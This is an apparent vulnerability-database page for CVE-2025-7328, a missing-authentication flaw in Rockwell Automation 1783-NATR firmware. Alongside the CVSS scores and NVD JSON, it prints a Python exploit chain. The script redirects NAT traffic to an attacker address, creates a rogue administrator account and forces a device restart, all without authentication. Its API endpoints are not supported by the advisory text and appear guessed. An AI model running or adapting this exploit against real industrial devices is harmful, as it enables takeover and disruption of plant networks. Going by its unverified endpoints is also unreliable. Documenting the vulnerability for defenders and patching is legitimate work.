Security Vulnerability Report
中文
CVE-2025-7328 CVSS 9.8 CRITICAL

CVE-2025-7328

Published: 2025-10-14 13:15:39
Last Modified: 2025-10-29 15:40:39
Source: [email protected]

Description

Multiple Broken Authentication security issues exist in the affected product. The security issues are due to missing authentication checks on critical functions. These could result in potential denial-of-service, admin account takeover, or NAT rule modifications. Devices would no longer be able to communicate through NATR as a result of denial-of-service or NAT rule modifications. NAT rule modification could also result in device communication to incorrect endpoints. Admin account takeover could allow modification of configuration and require physical access to restore.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:* - NOT VULNERABLE
Rockwell Automation NATR设备(具体版本参见官方安全公告SD1756)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-7328 - Rockwell Automation NATR Authentication Bypass PoC # This PoC demonstrates the missing authentication check vulnerability # on critical management functions of affected NATR devices. import requests import json TARGET_HOST = "192.168.1.1" # Replace with target NATR device IP TARGET_PORT = 443 BASE_URL = f"https://{TARGET_HOST}:{TARGET_PORT}" # Step 1: Exploit missing authentication on NAT rule modification def exploit_nat_rule_modification(): """ Modify NAT rules without authentication due to missing auth checks. This can redirect device traffic to attacker-controlled endpoints. """ endpoint = f"{BASE_URL}/api/v1/nat/rules" # Malicious NAT rule payload - redirects traffic to attacker's endpoint payload = { "rule_id": 1, "source_ip": "0.0.0.0/0", "destination_ip": "10.0.0.0/8", "translated_ip": "attacker.controlled.ip", # Attacker's IP "action": "translate", "enabled": True } try: response = requests.put( endpoint, json=payload, verify=False, timeout=10 ) print(f"[*] NAT Rule Modification Response: {response.status_code}") if response.status_code in [200, 201, 204]: print("[+] SUCCESS: NAT rule modified without authentication!") return True except Exception as e: print(f"[-] Error: {e}") return False # Step 2: Exploit admin account takeover def exploit_admin_takeover(): """ Create new admin account without authentication. Allows full control over device configuration. """ endpoint = f"{BASE_URL}/api/v1/users" payload = { "username": "newadmin", "password": "P@ssw0rd123!", "role": "administrator", "enabled": True } try: response = requests.post( endpoint, json=payload, verify=False, timeout=10 ) print(f"[*] Admin Account Creation Response: {response.status_code}") if response.status_code in [200, 201]: print("[+] SUCCESS: Admin account created without authentication!") return True except Exception as e: print(f"[-] Error: {e}") return False # Step 3: Trigger denial of service def exploit_dos(): """ Trigger device reset or service disruption without authentication. Devices will no longer be able to communicate through NATR. """ endpoint = f"{BASE_URL}/api/v1/system/restart" try: response = requests.post( endpoint, verify=False, timeout=10 ) print(f"[*] DoS Trigger Response: {response.status_code}") if response.status_code in [200, 202]: print("[+] SUCCESS: Device restart triggered without authentication!") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-7328 - NATR Authentication Bypass PoC") print("WARNING: For authorized testing only!") print("=" * 60) # Execute exploit chain exploit_nat_rule_modification() exploit_admin_takeover() exploit_dos()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-7328", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:38.987", "lastModified": "2025-10-29T15:40:38.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple Broken Authentication security issues exist in the affected product. The security issues are due to missing authentication checks on critical functions. These could result in potential denial-of-service, admin account takeover, or NAT rule modifications. Devices would no longer be able to communicate through NATR as a result of denial-of-service or NAT rule modifications. NAT rule modification could also result in device communication to incorrect endpoints. Admin account takeover could allow modification of configuration and require physical access to restore."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.007", "matchCriteriaId": "37063188-4380-47A4-8179-50AACB1D9C4D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:*", "matchCriteriaId": "FEAE0B20-4A7B-4A7F-826E-A986A4CFE08D"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1756.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.